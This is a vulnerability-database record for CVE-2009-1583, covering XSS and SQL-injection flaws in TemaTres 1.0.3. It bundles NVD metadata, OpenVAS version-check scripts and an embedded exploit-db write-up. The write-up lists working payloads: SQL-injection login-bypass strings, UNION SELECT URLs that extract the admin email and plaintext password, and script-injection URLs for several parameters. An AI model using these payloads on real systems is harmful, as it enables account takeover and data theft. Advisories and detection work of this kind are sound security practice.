ID CVE-2009-1583 Type cve Reporter NVD Modified 2018-10-10T15:37:25
Description
Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.
{"id": "CVE-2009-1583", "bulletinFamily": "NVD", "title": "CVE-2009-1583", "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "published": "2009-05-07T19:30:00", "modified": "2018-10-10T15:37:25", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/50343", "http://www.securityfocus.com/archive/1/503252/100/0/threaded", "http://www.securityfocus.com/bid/34830", "https://www.exploit-db.com/exploits/8615"], "cvelist": ["CVE-2009-1583"], "type": "cve", "lastseen": "2018-10-11T11:33:53", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "cvelist": ["CVE-2009-1583"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "edition": 2, "enchantments": {}, "hash": "6fa76576cd93ccb19cbcbe21cc929c48449be808df2c86287883ed8a9d66d57f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "fead923951cc0f7a640e3943e7e40728", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "ad1f8a506e27a5bed3286d2ef1f5084d", "key": "description"}, {"hash": "30fb372a127e8160d1f2373858048498", "key": "modified"}, {"hash": "38dd0d0936fb01b1d3aabf3ac979b2f0", "key": "cvelist"}, {"hash": "358ec1381bb40c663e9e62d0101b72ac", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "8de3bab86f04b1a98d885a2b8cd7f5f7", "key": "cpe"}, {"hash": "acc6828144a3c794f69254ec58fde3af", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "773e8d4d141288ada593470f214ee70f", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "id": "CVE-2009-1583", "lastseen": "2017-08-17T11:14:20", "modified": "2017-08-16T21:30:25", "objectVersion": "1.3", "published": "2009-05-07T19:30:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/50343", "http://www.securityfocus.com/archive/1/archive/1/503252/100/0/threaded", "http://www.milw0rm.com/exploits/8615", "http://www.securityfocus.com/bid/34830"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-1583", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:20"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "cvelist": ["CVE-2009-1583"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "edition": 1, "enchantments": {}, "hash": "f1409789df8fe2855d682ac87a113d17b6731e2cc8917b6167210b95e8783d05", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "fead923951cc0f7a640e3943e7e40728", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "ad1f8a506e27a5bed3286d2ef1f5084d", "key": "description"}, {"hash": "38dd0d0936fb01b1d3aabf3ac979b2f0", "key": "cvelist"}, {"hash": "358ec1381bb40c663e9e62d0101b72ac", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "8de3bab86f04b1a98d885a2b8cd7f5f7", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "773e8d4d141288ada593470f214ee70f", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3d65cf8afb4387676db5111251e904ca", "key": "references"}, {"hash": "181fc4af2aac76d1a203a2647b75edb5", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "id": "CVE-2009-1583", "lastseen": "2016-09-03T12:22:36", "modified": "2010-12-21T00:00:00", "objectVersion": "1.2", "published": "2009-05-07T19:30:00", "references": ["http://xforce.iss.net/xforce/xfdb/50343", "http://www.securityfocus.com/archive/1/archive/1/503252/100/0/threaded", "http://www.milw0rm.com/exploits/8615", "http://www.securityfocus.com/bid/34830"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-1583", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T12:22:36"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "cvelist": ["CVE-2009-1583"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form; (2) _expresion_de_busqueda, (3) letra, (4) estado_id, and (5) tema parameters to index.php; the (6) PATH_INFO to index.php; (7) unspecified parameters when editing a term as specified by the edit_id and tema parameters to index.php; and the (7) y, (8) ord, and (9) m parameters to sobre.php.", "edition": 3, "enchantments": {"score": {"modified": "2017-09-29T14:26:36", "value": 4.3, "vector": "NONE"}}, "hash": "813c5bacb71c2008fd7d2a1efb118a4f243f9a7cb36a4f68dc1f622b216b20eb", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "fead923951cc0f7a640e3943e7e40728", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "ad1f8a506e27a5bed3286d2ef1f5084d", "key": "description"}, {"hash": "71e3afaed7c274434a0fd5240adb5eb2", "key": "modified"}, {"hash": "38dd0d0936fb01b1d3aabf3ac979b2f0", "key": "cvelist"}, {"hash": "358ec1381bb40c663e9e62d0101b72ac", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "8de3bab86f04b1a98d885a2b8cd7f5f7", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "773e8d4d141288ada593470f214ee70f", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fe904f60ce30d1d4ecb90d03b18fe005", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1583", "id": "CVE-2009-1583", "lastseen": "2017-09-29T14:26:36", "modified": "2017-09-28T21:34:27", "objectVersion": "1.3", "published": "2009-05-07T19:30:00", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/50343", "http://www.securityfocus.com/archive/1/archive/1/503252/100/0/threaded", "http://www.securityfocus.com/bid/34830", "https://www.exploit-db.com/exploits/8615"], "reporter": "NVD", "scanner": [], "title": "CVE-2009-1583", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 3, "lastseen": "2017-09-29T14:26:36"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "8de3bab86f04b1a98d885a2b8cd7f5f7"}, {"key": "cvelist", "hash": "38dd0d0936fb01b1d3aabf3ac979b2f0"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "ad1f8a506e27a5bed3286d2ef1f5084d"}, {"key": "href", "hash": "773e8d4d141288ada593470f214ee70f"}, {"key": "modified", "hash": "837b82ee623746ed2d5ff32cc4c697d6"}, {"key": "published", "hash": "fead923951cc0f7a640e3943e7e40728"}, {"key": "references", "hash": "94bf126f4ca7597eae82568415bc9795"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "358ec1381bb40c663e9e62d0101b72ac"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f32cadf19c78c0edafe702ecf282e01e2f44511ade5c058af48f98e0a1de5be9", "viewCount": 0, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-10-11T11:33:53"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310800801", "OPENVAS:800801"]}, {"type": "exploitdb", "idList": ["EDB-ID:8615"]}], "modified": "2018-10-11T11:33:53"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "cpe": ["cpe:/a:r020:tematres:1.031", "cpe:/a:r020:tematres:1.0.3"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"openvas": [{"lastseen": "2017-07-02T21:14:11", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2016-12-30T00:00:00", "published": "2009-05-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800801", "id": "OPENVAS:800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tematres_mult_xss_n_sql_inj_vuln.nasl 4892 2016-12-30 15:39:07Z teissa $\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is\n disabled.\n Impact Level: Application\";\ntag_affected = \"TemaTres version 1.031 and prior\";\ntag_insight = \"Multiple flaws are due to\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO\n inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\";\ntag_solution = \"Upgrade to TemaTres version 1.033 or later.\n For updates refer to http://www.r020.com.ar/tematres/index.en.html#indice\";\ntag_summary = \"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.\";\n\nif(description)\n{\n script_id(800801);\n script_version(\"$Revision: 4892 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-30 16:39:07 +0100 (Fri, 30 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34983\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/34990\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8615\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\nif(!tematresPort){\n exit(0);\n}\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-16T12:39:14", "bulletinFamily": "scanner", "description": "The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.", "modified": "2019-05-14T00:00:00", "published": "2009-05-19T00:00:00", "id": "OPENVAS:1361412562310800801", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800801", "title": "TemaTres Multiple XSS and SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# TemaTres Multiple XSS and SQL Injection Vulnerabilities\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800801\");\n script_version(\"2019-05-14T12:12:41+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 12:12:41 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-05-19 08:03:45 +0200 (Tue, 19 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-1583\", \"CVE-2009-1584\", \"CVE-2009-1585\");\n script_bugtraq_id(34830);\n script_name(\"TemaTres Multiple XSS and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34983\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/34990\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8615\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/8616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_tematres_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"tematres/detected\");\n\n script_tag(name:\"impact\", value:\"Successful attacks will let the attacker steal cookie-based authentication\n credentials, compromise the application, access or modify data, or can exploit\n latest vulnerabilities in the underlying database when 'magic_quotes_gpc' is disabled.\");\n\n script_tag(name:\"affected\", value:\"TemaTres version 1.031 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to\n\n - In-adequate check of user supplied input which causes input validation error\n in the search form.\n\n - Validation check error in accepting user input for the following parameters\n a) _expresion_de_busqueda, b) letra c) estado_id and d) tema e) PATH_TO inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) y b) ord and c) m inside sobre.php.\n\n - Validation check error in accepting user input for the following parameters\n a) mail b) password inside index.php.\n\n - Validation check error in accepting user input for the following parameters\n a) dcTema b) madsTema c) zthesTema d) skosTema and e) xtmTema inside xml.php.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TemaTres version 1.033 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running TemaTres and is prone to Multiple XSS and SQL\n Injection Vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ntematresPort = get_http_port(default:80);\n\ntematresVer = get_kb_item(\"www/\" + tematresPort + \"/TemaTres\");\ntematresVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:tematresVer);\nif(tematresVer[1] != NULL)\n{\n if(version_is_less_equal(version:tematresVer[1], test_version:\"1.031\")){\n security_message(tematresPort);\n }\n}\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:46:07", "bulletinFamily": "exploit", "description": "TemaTres 1.0.3 (Auth Bypass/SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-1583,CVE-2009-1584,CVE-2009-1585. Webapps exploit for php platform", "modified": "2009-05-05T00:00:00", "published": "2009-05-05T00:00:00", "id": "EDB-ID:8615", "href": "https://www.exploit-db.com/exploits/8615/", "type": "exploitdb", "title": "tematres 1.0.3 auth bypass/sql/XSS Multiple Vulnerabilities", "sourceData": "***********************************************************************************************\n***********************************************************************************************\n**\t \t\t\t\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **\n** || || || [] [][] [] [] [] [] [] [] [] []\t [] [] **\n [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **\n** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\\ \n**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--\n** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ \n [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **\n**\t\t\t\t\t\t\t **\n** \t\t\t\t\t\t\t\t\t\t\t **\n** \u00c2\u00a1VIVA SPAIN!...\u00c2\u00a1GANAREMOS EL MUNDIAL!...o.O **\n**\t\t\t\t\t\u00c2\u00a1PROUD TO BE SPANISH!\t\t\t\t **\n**\t\t\t\t\t\t\t\t\t\t\t **\n***********************************************************************************************\n***********************************************************************************************\n\n----------------------------------------------------------------------------------------------\n| \t \t \tMULTIPLE REMOTE VULNERABILITIES\t\t \t |\n|--------------------------------------------------------------------------------------------|\n| \t | TemaTres V1.0.3 |\t\t \t\t |\n| CMS INFORMATION:\t\t -----------------\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t |\n|-->WEB: http://www.r020.com.ar/tematres/ \t \t\t |\n|-->DOWNLOAD: http://sourceforge.net/projects/tematres/ \t \t\t |\n|-->DEMO: http://www.r020.com.ar/tematres/index.php\t\t\t\t\t |\n|-->CATEGORY: CMS / Portals\t\t\t\t\t\t\t\t |\n|-->DESCRIPTION: Web application to manage controlled vocabularies, taxonomies and thesaurus |\n| \t\t/ Aplicaci\u00c3\u00b3n Web para la gesti\u00c3\u00b3n de lenguajes documentales, ... \t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\n|\t\t\t\t\t\t\t\t\t\t\t |\n|-->TESTED ON: firefox 3\t\t\t\t\t\t\t\t |\n|-->DORKs: \"Powered by TemaTres\" / \"Generado por TemaTres\" / \"Criado por TemaTres\"\t |\n|-->CATEGORY: AUTH BYPASS/ SQL INJECTION/ XSS\t\t\t \t\t\t |\n|-->AFFECT VERSION: LAST = 1.0.3 (maybe <= ?)\t\t\t\t\t\t |\n|-->Discovered Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Reported Bug date: 2009-04-23\t\t\t\t\t\t\t |\n|-->Fixed bug date: 2009-05-04\t\t\t\t\t\t\t\t |\n|-->Info patch (v1.0.31): http://www.r020.com.ar/tematres/tematres1.031.zip\t\t |\n|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\n|-->mail: y3nh4ck3r[at]gmail[dot]com\t\t\t\t\t\t\t |\n|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\n|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\n|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)\t\t\t |\n----------------------------------------------------------------------------------------------\n\n############\n------------\nCONDITIONS:\n------------\n############\n\n\n**gpc_magic_quotes=off\n\n**DBPREFIX='lc_' (Default)\n\n\n####################\n--------------------\nAUTH BYPASS (SQLi):\n--------------------\n####################\n\n\nmail:' or 1=1 /*\npassword: Nothing\n\nOr...\n\nmail: Something\npassword:' or 1=1 /*\n\n\n######################\n----------------------\nSQL INJECTION (SQLi):\n----------------------\n######################\n\n\n~~~~---->Unregistered user (get var --> 'letra'):\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>\n\n~~~~---->Resgistered user (get vars --> 'y' and 'm'):\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007\n\n<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>\n\n\n############################\n----------------------------\nCROSS SITE SCRIPTING (XSS):\n----------------------------\n############################\n\n\nThere are a lot of links (This isn't entire list):\n\n\n~------->Unregistered user\n\n\n<----Search form---->\n\n<script>while(1){alert('y3nh4ck3r was here!')}</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')</script>&sgs=off\n\nhttp://[HOST]/[HOME_PATH]/index.php?letra=D<script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?estado_id=14\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/index.php?tema=2&/trmino-subordinado-de-ejemplo\"><script>alert('y3nh4ck3r was here!')</script>\n\n\n~------->Registered user\n\n\n<----Posting here---->\n\nhttp://[HOST]/[HOME_PATH]/index.php?edit_id=12&tema=12\n\n<script>alert('y3nh4ck3r was here!')</script>\n\n\n<----More links---->\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007&ord=F\"><script>alert('y3nh4ck3r was here!')</script>\n\nhttp://[HOST]/[HOME_PATH]/sobre.php?m=10\"><script>alert('y3nh4ck3r was here!')</script>&y=2007\n\n\n-------------------EOF---------------------------------->>>ENJOY IT!\n\n\n#######################################################################\n#######################################################################\n##*******************************************************************##\n## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##\n##*******************************************************************##\n##-------------------------------------------------------------------##\n##*******************************************************************##\n## GREETZ TO: JosS, Ulises2k and all spanish Hack3Rs community! ##\n##*******************************************************************##\n#######################################################################\n#######################################################################\n\n# milw0rm.com [2009-05-05]\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8615/"}]}
